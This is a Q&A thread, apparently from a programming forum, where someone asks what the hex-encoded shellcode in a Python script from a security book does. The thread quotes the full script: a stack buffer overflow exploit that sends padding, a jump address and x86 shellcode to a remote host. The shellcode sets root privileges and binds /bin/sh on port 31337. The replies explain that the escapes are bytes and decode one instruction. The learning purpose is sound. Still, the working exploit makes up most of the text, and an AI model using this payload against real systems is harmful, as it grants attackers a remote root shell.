# What does this code encoded with \x... do?

Tags: python, security

I got this from a security book and I wonder how can I decode the part `shellcode`

```
#!/usr/bin/python

from socket import *

# *** Generated with libShellCode
# setuid(0) + setgid(0) + bind(/bin/sh) on port 31337
shellcode = \
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x31\xdb\xb0\x2e\xcd\x80" + \
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" + \
"\x89\xc7\x31\xc9\x66\xb9\x7a\x69\x52\x66\x51\x43\x66\x53\x89\xe1" + \
"\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd" + \
"\x80\x31\xc0\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x89\xc3" + \
"\x89\xd9\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\xeb\x18\x5e\x31\xc0\x88" + \
"\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d" + \
"\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"

s = socket(AF_INET, SOCK_STREAM)
s.connect(("bob", 12345))

padding = (64  + 8) * "A"
jmp_addr = "\xa6\xf7\x09\x08" # 0x0809f7a6

s.send(padding + jmp_addr + shellcode)
s.close()
```

Can the `shellcode` be made humanreadable?

Comment: do you want to convert it to numbers? `''.join([str(ord(k)) for k in shellcode])`

Comment: See the comment that reads `# *** Generated with libShellCode`? Did you try looking up documentation for that library, in order to understand what it does?

Comment: @user1889297 So the `\x31` ... symbols are bytes?

Comment: @KarlKnechtel Is `shellcode` doing `setuid(0) + setgid(0) + bind(/bin/sh) on port 31337`?

Comment: @tripleee I'm impressed you were able to find a duplicate for this.

Answer (score 0):

OK... checking out libShellCode more carefully, there's a library of byte code instructions.

As an example, `\x31\xc0` is here (`lib/i386/i386_doces.c`):

```
 XOR_EAX_EAX  = (char *) strdup("\x31\xc0"); // xor    %eax, %eax
```

So here a `XOR` is defined.